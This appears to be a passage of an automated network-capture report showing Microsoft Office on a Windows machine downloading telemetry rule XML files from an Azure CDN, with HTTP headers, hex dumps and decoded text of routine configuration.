                            2024-11-14 22:38:51 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                            Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                            2024-11-14 22:38:51 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                            Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                            2024-11-14 22:38:51 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                            Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                            2024-11-14 22:38:51 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                            Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                            2024-11-14 22:38:51 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                            2024-11-14 22:38:51 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                            2024-11-14 22:38:51 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                            Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            13192.168.2.45513913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:52 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:52 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:52 GMT
                            Content-Type: text/xml
                            Content-Length: 3788
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                            ETag: "0x8DC582BAC2126A6"
                            x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223852Z-16547b76f7fht2hfhC1DFWbngg00000000sg00000000t3y6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:52 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                            Session IDSource IPSource PortDestination IPDestination Port
                            14192.168.2.45514113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:52 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:52 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:52 GMT
                            Content-Type: text/xml
                            Content-Length: 2160
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                            ETag: "0x8DC582BA3B95D81"
                            x-ms-request-id: d96f0357-501e-00a0-7911-369d9f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223852Z-1749fc9bdbddsfp5hC1DFWz2ng0000000110000000009gqg
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:52 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            15192.168.2.45514313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:52 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:52 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:52 GMT
                            Content-Type: text/xml
                            Content-Length: 408
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                            ETag: "0x8DC582BB56D3AFB"
                            x-ms-request-id: 802248f8-d01e-0049-6b0c-36e7dc000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223852Z-r178fb8d7656shmjhC1DFWu5kw000000036g00000000d2ys
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:52 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            16192.168.2.45514213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:52 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:52 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:52 GMT
                            Content-Type: text/xml
                            Content-Length: 450
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                            ETag: "0x8DC582BD4C869AE"
                            x-ms-request-id: ea341ef8-a01e-0098-41af-368556000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223852Z-1749fc9bdbddwt7mhC1DFWssk8000000010000000000xwht
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:52 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                            Session IDSource IPSource PortDestination IPDestination Port
                            17192.168.2.45514013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:52 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:52 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:52 GMT
                            Content-Type: text/xml
                            Content-Length: 2980
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                            ETag: "0x8DC582BA80D96A1"
                            x-ms-request-id: db45c3c2-701e-0053-2e8e-363a0a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223852Z-164f84587bfdx9djhC1DFW956g00000000e0000000007f6u
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:52 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                            Session IDSource IPSource PortDestination IPDestination Port
                            18192.168.2.45514613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:53 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:53 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:53 GMT
                            Content-Type: text/xml
                            Content-Length: 471
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                            ETag: "0x8DC582BB10C598B"
                            x-ms-request-id: 093990f7-401e-0048-6d75-360409000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223853Z-r178fb8d765w8fzdhC1DFW8ep4000000033000000000m7aa
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:53 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            19192.168.2.45514513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:53 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:53 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:53 GMT
                            Content-Type: text/xml
                            Content-Length: 415
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                            ETag: "0x8DC582B9F6F3512"
                            x-ms-request-id: fa88b3fb-501e-0064-3f39-361f54000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223853Z-1866b5c5fbbqjkpbhC1DFWt4h400000000m000000000m69w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:53 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                            Session IDSource IPSource PortDestination IPDestination Port
                            20192.168.2.45514413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:53 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:53 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:53 GMT
                            Content-Type: text/xml
                            Content-Length: 474
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                            ETag: "0x8DC582B9964B277"
                            x-ms-request-id: 3bbfe6b2-c01e-0082-3016-36af72000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223853Z-1866b5c5fbbrf5vdhC1DFW64zw00000000rg0000000006vv
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
